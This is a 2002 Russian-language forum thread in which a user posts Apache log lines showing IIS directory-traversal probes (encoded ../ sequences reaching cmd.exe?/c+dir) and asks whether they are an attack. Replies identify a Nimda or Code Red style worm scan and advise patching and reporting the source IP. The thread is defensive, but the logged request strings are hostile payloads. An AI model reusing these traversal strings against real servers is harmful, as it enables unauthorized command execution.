Kamrad.ru
 
 
дневники | кабинет | регистрация | календарь | участники | faq | правила | поиск | фотоальбом | каська | выйти
Kamrad.ru Kamrad.ru » Форумы общей тематики » Программы (software) » Меня пытаются взломать?
новая тема  ответить следующая тема | предыдущая тема
Автор
 
bloodmeri - offline bloodmeri
04-05-2002 22:10 URL сообщения Дневник     K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад



 Меня пытаются взломать?

212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /sсripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /sсripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:17 +0200] "GET /sсripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
212.179.66.69 - - [05/May/2002:00:55:18 +0200] "GET /sсripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
___________________________________________________


это кусок log файла от апачи сервера.
по моему это не должно так выглядеть.

посоветуйте б что енто такое


__________________
Linuх Is Likе А Wigwаm - Nо Windоws, Nо Gаtеs Аnd Аn Арасhе Insidе...

референт - offline референт
04-05-2002 23:55 URL сообщения Дневник     K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад

Обычная отака с использованием известных дыр.Вовремя ставить заплатки.И послать письмо с этими логами провайдеру в чьем ведении этот IP.Хотя ничего серьезного в этом нет.Пусть на халяву проверяют уязвимости сервера.
bloodmeri - offline bloodmeri
05-05-2002 04:24 URL сообщения Дневник     K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад

спасибо.
а то я сомневался в том что ето атака.
письмо уже послал.
пошел ставить заплатки
Moonshade - offline Moonshade
05-05-2002 22:22 URL сообщения      K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад

Это похоже на Нимду или Редкод. Пашет только на непатченных IIS.
bloodmeri - offline bloodmeri
06-05-2002 09:00 URL сообщения Дневник     K-Mail    Профиль    Поиск    Контакт-лист   Редактировать
Камрад

похоже что какая-то программа , потому что ломится целыми днями.
по IP можно как нибудь свяэатся с ним ?
netmeeting , ICQ , winpopup ?
потому как он может и не знает что от него кто - то ломится ?
Текущее время: 05:17
новая тема  ответить следующая тема | предыдущая тема
 
Перейти:

версия для печати   отправить эту страницу по e-mail   подписаться на эту тему

 
Powered by: vBulletin Version 2.0.1
Copyright ©2000, 2001, Jelsoft Enterprises Limited.
Любое использование материалов сайта
возможно только с разрешения его администрации.

 

Рейтинг@Mail.ru
Рейтинг@Mail.ru